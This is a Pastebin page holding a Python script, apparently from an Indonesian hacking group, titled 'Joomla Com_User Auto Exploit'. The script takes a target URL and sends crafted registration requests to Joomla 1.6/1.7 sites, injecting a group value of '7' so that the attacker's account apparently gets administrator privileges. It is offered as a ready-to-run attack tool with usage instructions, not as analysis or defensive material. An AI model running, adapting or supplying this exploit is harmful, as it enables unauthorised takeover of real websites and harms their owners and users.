API tools faq
paste
Advertisement
Guest User

joomla auto exploit

a guest
Sep 9th, 2014
751
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.89 KB | None | 0 0
raw download clone embed print report
  1. #!/usr/bin/python
  2. # Joomla Com_User Auto Exploit
  3. # By xSecurity
  4. # Modif Sign by SunDi3yansyah | Surabaya Blackhat
  5.  
  6. import requests as sec4ever, re, urllib, sys, os
  7. from threading import Thread
  8. from time import sleep
  9. def cls():
  10. os.system(['clear','cls'][os.name =='nt'])
  11.  
  12. cls()
  13. print '''
  14. ____ _ ____ _ _ _ _
  15. / ___| _ _ _ __ __ _| |__ __ _ _ _ __ _ | __ )| | __ _ ___| | _| |__ __ _| |_
  16. \___ \| | | | '__/ _` | '_ \ / _` | | | |/ _` | | _ \| |/ _` |/ __| |/ / '_ \ / _` | __|
  17. ___) | |_| | | | (_| | |_) | (_| | |_| | (_| | | |_) | | (_| | (__| <| | | | (_| | |_
  18. |____/ \__,_|_| \__,_|_.__/ \__,_|\__, |\__,_| |____/|_|\__,_|\___|_|\_\_| |_|\__,_|\__|
  19. |___/
  20. _ _
  21. | _ _.._._ _|_ _ |_) _ |_) __|__|_ _ ._
  22. |_(/_(_|| | | |_(_) |_)(/_ |_)(/_|_ |_(/_|
  23. ---------------------------------------------------------------------
  24. Joomla Version [1.6|1.7] [Com_User] Auto Exploit
  25. Require Need Install Requests Python Package (Cari di google)
  26. --------------------------------------------------------------
  27. Surabaya Blackhat | Surabaya Hackerlink | Yogyakarta Blackhat
  28. --------------------------------------------------------------
  29. Please wait...'''
  30.  
  31. pwd2 = 'fio3jfiej9cewc9c9w0eufew9u'
  32. def one(target,pwd1,pwd2,email):
  33. # Wrong Password
  34. x1 = xsec.get(target+'/index.php?option=com_users&view=registration')
  35. token = re.findall('type="hidden" name="(.*?)" value="1"', x1.text)
  36. post = {}
  37. post["jform[name]"] = 'SunDi3yansyah'
  38. post["jform[username]"] = user
  39. post["jform[password1]"] = pwd1
  40. post["jform[password2]"] = pwd2
  41. post["jform[email1]"] = email
  42. post["jform[email2]"] = email
  43. post["jform[groups][]"] = "7"
  44. post["option"] = "com_users"
  45. post["task"] = "registration.register"
  46. post[token[0]] = "1"
  47. p1 = xsec.post(target+'/index.php?option=com_users&view=registration', data=urllib.urlencode(post))
  48. x2 = xsec.get(target+'/index.php/component/users/?view=registration&layout=complete')
  49.  
  50. def exploit(target,pwd1,pwd2,email):
  51. # Wrong Password
  52. x3 = xsec.get(target+'/index.php?option=com_users&view=registration')
  53. token = re.findall('type="hidden" name="(.*?)" value="1"', x3.text)
  54. post = {}
  55. post["jform[name]"] = 'SunDi3yansyah'
  56. post["jform[username]"] = user
  57. post["jform[password1]"] = pwd1
  58. post["jform[password2]"] = pwd1
  59. post["jform[email1]"] = email
  60. post["jform[email2]"] = email
  61. post["jform[groups][]"] = "7"
  62. post["option"] = "com_users"
  63. post["task"] = "registration.register"
  64. post[token[0]] = "1"
  65. p2 = xsec.post(target+'/index.php?option=com_users&view=registration', data=urllib.urlencode(post))
  66. x4 = xsec.get(target+'/index.php/component/users/?view=registration&layout=complete')
  67.  
  68. xsec = sec4ever.session()
  69. if len(sys.argv) == 5:
  70. target = sys.argv[1]
  71. user = sys.argv[2]
  72. pwd1 = sys.argv[3]
  73. email = sys.argv[4]
  74. one(target,pwd1,pwd2,email)
  75. ex = exploit(target,pwd1,pwd2,email)
  76. print ' * Go To Your Email & Active Then Login \n * Username: '+user+' & Password: '+pwd1
  77. else:
  78. print "Usage: python tool.py http://target.com/ youruser yourpass yourmail"
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!